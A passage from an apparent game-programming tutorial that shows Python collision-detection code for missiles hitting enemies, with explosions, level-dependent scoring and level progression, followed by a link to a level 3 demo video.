for j in range(len(player.getMissileManager().missile_list)):
self.mm_rect = Rect(player.getMissileManager().missile_list[j].x,
player.getMissileManager().missile_list[j].y, player.getMissileManager().width,
player.getMissileManager().height)
if (self.em_rect.colliderect(self.mm_rect)):
e_list[i].on = False
player.getMissileManager().missile_list[j].on = False
if (e_list[i].hit == False):
ex.create_explosion(e_list[i].x, e_list[i].y + 2)
e_list[i].hit = True
if(level == 3):
score.set_score(10)
else:
score.set_score(1)
if (score.score >= gm.level_manager.get_level() * 30):
gm.level_manager.increase_level()

Here is what level 3 looks like.

http://gamingdirectional.com/wp-content/uploads/2018/12/game_strike-4.mp4

Now we have concluded the game level related topics and we will create the about scene and the credit scene in the next chapter.

Viewing all 9596 articles
Browse latest View live